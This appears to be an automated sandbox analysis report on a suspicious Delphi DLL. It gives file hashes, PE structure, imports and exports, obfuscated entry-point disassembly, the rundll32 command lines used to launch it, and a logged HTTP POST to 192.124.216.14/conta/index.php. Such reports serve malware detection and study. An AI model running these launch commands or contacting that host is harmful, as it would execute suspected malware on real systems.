      SHA1:CB8E07275009B896338A056B2D7A268E4BD65EEB
      SHA-256:5B15C70230A447C477C412A831B39898BBEDBAD50CA05566120693539C1E9DAA
      SHA-512:81270F071AB830AABC41E5DC88C7F2867D72E612CA7CDE255BD6A0C739011A9BE298DEC2061F34752C3977D39A58B9660323E5E113E00E44D7DD7FDFD73D5D78
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.3.6.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4650
      Entropy (8bit):4.473952328929013
      Encrypted:false
      SSDEEP:48:cvIwWl8zslJg77aI9SNWpW8VYh5Ym8M4JCdPzF3+q8/7lGScSbd:uIjf/I7k87VaoJysJ3bd
      MD5:BBE470D21CC75C5F1AA27070AC535201
      SHA1:3D251AFCFEFC91649476A3AE9B81C5279EED414A
      SHA-256:21A0CF19B6EB39F7DB3463EBBD293F2E9E4FFABF4815468C80C927A082D3D5A4
      SHA-512:8161F7A99B46B121AB25E65C4E4E126D29196D9EF5F8FF49D99A055E4E6108550EE2F68703ECC767398D02FEE15A2F5A654C931A9363F25D6BEF2FF7479C3CAD
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624809" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:27:16 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):45676
      Entropy (8bit):2.0263254461400906
      Encrypted:false
      SSDEEP:192:hO0DXP8/XSIqePCO5H4e3/b6Wzw0ypnAR8C8V9H:ckkLrl5H3PbnzfypnAOv
      MD5:78A84F8C0BE93D3FD75AD05B2D88AC7E
      SHA1:34E75D6D8DF026FE6B3CAB083E6D5C0409056D38
      SHA-256:1F95C418D392FC53E9C37FBA35B8C98FF7041069F0C72B729ED2A49F244AE54D
      SHA-512:F942A6E813566C76E706DDF02FD5AD9AA84D6D0A83396D7339F42DD40DFA17DED1B3A2FDE467A18B7F2E3672546B9FBDF1EE804EBB532B19F2EEA8AE59575890
      Malicious:false
      Preview:MDMP..a..... .......D.Wg.........................................1..........T.......8...........T......................................|...............................................................................eJ....... ......GenuineIntel............T.......4...*.Wg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8362
      Entropy (8bit):3.695605645850704
      Encrypted:false
      SSDEEP:192:R6l7wVeJdL6CX96Y6q61gmf84eprG89brMwfsfRxqm:R6lXJB6Q96Yf61gmf84krMwEfXb
      MD5:99F8EEFEEEC535CCE6743A9057873C8A
      SHA1:A147572FCCAC33A3AE9B2FC1C19EE804824F6D4B
      SHA-256:79FDBE5C21A68ECEF1E56DA1C2D9E452E4A001C4E808386081CBA4E7382030F3
      SHA-512:CA0E39E484D2D7B748BBAD3135CDD99E21258073FD40DC4D2EBCD768637B25C5E7614B3590137417A5CB28D697DC02CA6A9D9CE7527CF43DCB17F18AE8FFAE68
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.9.6.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4751
      Entropy (8bit):4.457664535090105
      Encrypted:false
      SSDEEP:48:cvIwWl8zslJg77aI9SNWpW8VYGYm8M4JCdPKZFbZ+q8vjPKqGScSvd:uIjf/I7k87VCJhxKmqJ3vd
      MD5:2D247FE5E2CE234D31B604FC05D417A4
      SHA1:4A2E3C993D53C6370585F5710B2930222D2ECAAD
      SHA-256:E6C36B8627E09315B3AA1351BE605895505740288A7E2CE6FC30B6DA151635E6
      SHA-512:E1EFF2110DE8666C5B60AA9244C7E6C895F61D55F57AFFFF30F640E14019B565B716BE10320A9787780DEA40001B33695A5F0C3C390027917336DE6210BDBC10
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624809" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:27:21 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):46440
      Entropy (8bit):2.047470621180156
      Encrypted:false
      SSDEEP:192:gocXf8/X2IaQtZO5H4e30JlmJMzQVthtYOYnU8:M0XaQC5H3KlwMzQncO2
      MD5:BCBDB91A070B255959FB8AE04750851C
      SHA1:97F7F4BED1507A460492DA8F7E5B5148A0951D61
      SHA-256:988D0E6992E1FBD7C332FFCB582F34173F9B8FA5B59190C9D9F8830B7518E10E
      SHA-512:4F1AD604F5195340B39EB2073F64495D97ADEA02B7F76162F813296B50562D088811EAF0F3EB67D7CEC25191D5050860320C3386120D8E73BC125FECB88CEB09
      Malicious:false
      Preview:MDMP..a..... .......I.Wg.........................................1..........T.......8...........T.......................................|...............................................................................eJ....... ......GenuineIntel............T.......\...*.Wg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8298
      Entropy (8bit):3.6971705705393036
      Encrypted:false
      SSDEEP:192:R6l7wVeJo66bg6Y6P61gmfT4eprM89brgssfTGxGm:R6lXJ96M6Ya61gmfT4yrg/fT0v
      MD5:818C0AA87E5213FA5D2882A7CF6B8A25
      SHA1:3BFE059D5E57B7F2911721CC0D024A878359E134
      SHA-256:DD10B714EDEB8EFF05F99CA205E1F6026EAFC010DE704B90FE445E50A0916D89
      SHA-512:AE55938B63D08D1AE11D7A2490346547CC69FD87CB903F9F359EBAD7F0E6AB7E07A2176950F7F87AC04EF62CCE2BE24F639660653FD4DB83D6F561F13D05330C
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.8.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4650
      Entropy (8bit):4.471359943734847
      Encrypted:false
      SSDEEP:48:cvIwWl8zs3Jg77aI9SNWpW8VYiYm8M4JCdPzFWSdm+q8/7ZGScSNad:uIjfZI7k87VGJ7SAIJ3Nad
      MD5:7005C33BA6A8AC47BFB54B9ACD33088F
      SHA1:2352AA8422330FD1940B9762BD32997184B7D226
      SHA-256:59725CDC46442A90FFCE3591A915A6ED67CDA71889B5D3A150FF859F5CA48552
      SHA-512:FBDE9A83D307983A2B65B0D442D55ABA7DA6BECBA1AB3C63B64DBBB44B9B964157A6CC3134D3E908C7C6E47CA8850C35529645657CA7A51E29B39A6F24AE1D70
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624810" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):1835008
      Entropy (8bit):4.29613346853373
      Encrypted:false
      SSDEEP:6144:n41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+vwmBMZJh1Vj/:41/YCW2AoQ0NipwwMHrVT
      MD5:FFB1ABE7BE8E8D0E51F5271E38BEB07D
      SHA1:1B26FBD0DF3396C82C0364A50D13DD18A08B76E7
      SHA-256:F2982E5FF426302B516F7B9ADEA897CD47F387CAAF6E3839376697C5C45427A3
      SHA-512:23F763F53EB15D80CF3AE22F06064FF33DF3B7FE43F31D19F908EF73C2AC23A124426A08FC413AED89E9D6998124126F8F2444544BF846492E25D24F7B2AD216
      Malicious:false
      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...~.J................................................................................................................................................................................................................................................................................................................................................J........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Entropy (8bit):7.972921603246253
      TrID:
      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
      • Generic Win/DOS Executable (2004/3) 0.20%
      • DOS Executable Generic (2002/1) 0.20%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:Y7KU3yvGQ6.dll
      File size:17'234'944 bytes
      MD5:ed7c5857a2a61a69f73ca5f01c0f1c8c
      SHA1:ac4c87194f5b5b731c616bcc9873f8397796e686
      SHA256:b3243d65c7b8bea56f75411c660afbc43e701b4cd453b47e61fb5a797a2e6c18
      SHA512:6dcb6580e388d3e33c835e778dad82472dbeecfd4e4cfb093ef4da9561de12131c7217bc2618d040946563d2738de098f16090ccc61d9d09bd29050b934fe733
      SSDEEP:393216:uwARThTHHFaR5gKCpzOXO/W5GGWVq/mBaW9PRtXmbbZ:fARlT8XCAXO/WMfc/mD7mbF
      TLSH:1507339A7DDB4091E4C108F4DB1B7BDB23F2961A4AC708397DC539C630E1FA6622B947
      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
      Icon Hash:7ae282899bbab082
      Entrypoint:0x34b66f4
      Entrypoint Section:.:!0
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
      Time Stamp:0x675705E5 [Mon Dec 9 14:59:49 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:0
      File Version Major:5
      File Version Minor:0
      Subsystem Version Major:5
      Subsystem Version Minor:0
      Import Hash:66e4b3441c1028ee7f0c98948771803c
      Instruction
      call 00007F9A3CD9C79Eh
      inc ecx
      mov ebx, A2164D22h
      dec ecx
      bswap ebx
      dec ecx
      sub esp, 00000004h
      inc ecx
      mov esi, dword ptr [esp]
      dec ecx
      sar ebx, 17h
      inc ebp
      mov edi, ebx
      dec edi
      lea ebx, dword ptr [ebx+edi*8+7A37760Fh]
      inc ecx
      xor esi, edx
      inc bp
      btc ebx, ebx
      dec ecx
      bts ebx, FFFFFFA2h
      inc bp
      btc ebx, edi
      rol esi, 1
      inc edx
      lea esi, dword ptr [esi+edi-68298774h]
      inc ecx
      movsx edi, di
      inc ebp
      movzx ecx, di
      dec ebp
      lea eax, dword ptr [edi+4F0A48B6h]
      xor esi, 36877B93h
      dec ebx
      lea eax, dword ptr [ecx+ecx+428CDF20h]
      inc ebp
      movsx esi, ax
      inc esi
      inc ecx
      push edx
      cdq
      inc ecx
      movzx ebx, al
      inc ecx
      xor bl, bl
      xor dword ptr [esp+edi*2-00008800h], esi
      inc ecx
      pop edx
      dec edx
      lea ecx, dword ptr [edi+esi*8-5A6073D1h]
      dec eax
      arpl si, si
      dec esp
      add ebp, esi
      cwd
      jmp 00007F9A3CCD7DDEh
      mov edi, 2BA81C05h
      jmp 00007F9A3CE4FAF7h
      xor ecx, ebx
      bswap ecx
      shl dx, 006Ah
      sal dl, FFFFFF87h
      dec ecx
      ror ecx, 02h
      inc ecx
      sal ax, 004Fh
      lea edx, dword ptr [edx+edx*2-6EF0BE74h]
      cmovnb eax, edx
      xor ebx, ecx
      add edi, ecx
      cwde
      sar edx, 77h
      mov edx, dword ptr [ebp+edx*2-0000017Dh]
      add al, al
      Name | Virtual Address | Virtual Size | Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2434354 | 0xe2 | .:!0
      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2fe5bd8 | 0x230 | .:!0
      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x32d1000 | 0x4f8 | .reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_IAT | 0x2261000 | 0xf0 | .#>*
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x30521e4 | 0x1c0 | .:!0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
      .text | 0x1000 | 0x30a204 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .itext | 0x30c000 | 0x24d4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .data | 0x30f000 | 0x10280 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .bss | 0x320000 | 0x6fbc | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .idata | 0x327000 | 0x3d52 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .didata | 0x32b000 | 0xa9a | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .edata | 0x32c000 | 0xe2 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .rdata | 0x32d000 | 0x44 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .R6V | 0x32e000 | 0x1f32230 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .#>* | 0x2261000 | 0xcc0 | 0xe00 | cb6a4370d0f0ca6913354c77f94c88a7 | False | 0.050502232142857144 | data | 0.41212055563753786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .:!0 | 0x2262000 | 0x106e260 | 0x106e400 | 0a60ebea294551d19f091c7380ab69a1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .reloc | 0x32d1000 | 0x4f8 | 0x600 | e7ea81a6b93ce920adeaa4dea3e31913 | False | 0.4427083333333333 | data | 3.9922583785129406 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      DLL | Import
      oleaut32.dll | SysFreeString
      advapi32.dll | RegQueryValueExW
      user32.dll | CharNextW
      kernel32.dll | GetVersion
      kernel32.dll | GetProcAddress
      user32.dll | SetClassLongW
      gdi32.dll | UnrealizeObject
      version.dll | VerQueryValueW
      kernel32.dll | GetVersionExW, GetVersion
      advapi32.dll | RegUnLoadKeyW
      kernel32.dll | Sleep
      netapi32.dll | NetApiBufferFree
      oleaut32.dll | SafeArrayPtrOfIndex
      oleaut32.dll | GetErrorInfo
      ole32.dll | OleUninitialize
      shell32.dll | Shell_NotifyIconW
      comctl32.dll | InitializeFlatSB
      user32.dll | EnumDisplayMonitors
      msvcrt.dll | memset
      shell32.dll | SHGetFolderPathW
      winspool.drv | OpenPrinterW
      winspool.drv | GetDefaultPrinterW
      wsock32.dll | WSACleanup
      Magnification.dll | MagSetImageScalingCallback
      kernel32.dll | GetConsoleWindow
      kernel32.dll | GetSystemTimeAsFileTime
      kernel32.dll | HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
      Name | Ordinal | Address
      GetInstallDetailsPayload | 5 | 0x700c98
      SignalInitializeCrashReporting | 4 | 0x700c9c
      TMethodImplementationIntercept | 3 | 0x4643b0
      __dbk_fcall_wrapper | 2 | 0x410bb4
      dbkFCallWrapperAddr | 1 | 0x723634
      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Dec 10, 2024 07:26:50.070617914 CET | 49746 | 80 | 192.168.2.10 | 192.124.216.14
      Dec 10, 2024 07:26:50.190023899 CET | 80 | 49746 | 192.124.216.14 | 192.168.2.10
      Dec 10, 2024 07:26:50.190140009 CET | 49746 | 80 | 192.168.2.10 | 192.124.216.14
      Dec 10, 2024 07:26:50.190380096 CET | 49746 | 80 | 192.168.2.10 | 192.124.216.14
      Dec 10, 2024 07:26:50.309614897 CET | 80 | 49746 | 192.124.216.14 | 192.168.2.10
      Dec 10, 2024 07:26:51.667148113 CET | 80 | 49746 | 192.124.216.14 | 192.168.2.10
      Dec 10, 2024 07:26:51.667714119 CET | 49746 | 80 | 192.168.2.10 | 192.124.216.14
      Dec 10, 2024 07:26:51.787439108 CET | 80 | 49746 | 192.124.216.14 | 192.168.2.10
      Dec 10, 2024 07:26:51.787506104 CET | 49746 | 80 | 192.168.2.10 | 192.124.216.14
      • 192.124.216.14
      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      0 | 192.168.2.10 | 49746 | 192.124.216.14 | 80 | 5988 | C:\Windows\SysWOW64\rundll32.exe
      Timestamp | Bytes transferred | Direction | Data
      Dec 10, 2024 07:26:50.190380096 CET | 236 | OUT | POST /conta/index.php HTTP/1.0
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 0
      Host: 192.124.216.14
      Accept: text/html, */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
      Dec 10, 2024 07:26:51.667148113 CET | 203 | IN | HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 06:26:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8


      Target ID:0
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\System32\loaddll32.exe
      Wow64 process (32bit):true
      Commandline:loaddll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll"
      Imagebase:0xdd0000
      File size:126'464 bytes
      MD5 hash:51E6071F9CBA48E79F10C84515AAE618
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      Target ID:1
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff620390000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:2
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
      Imagebase:0xd70000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      Target ID:4
      Start time:01:26:26
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
      Imagebase:0x430000
      File size:61'440 bytes
      MD5 hash:889B99C52A60DD49227C5E485A016679
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Borland Delphi
      Reputation:high
      Has exited:true

      Target ID:6
      Start time:01:26:29
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,SignalInitializeCrashReporting
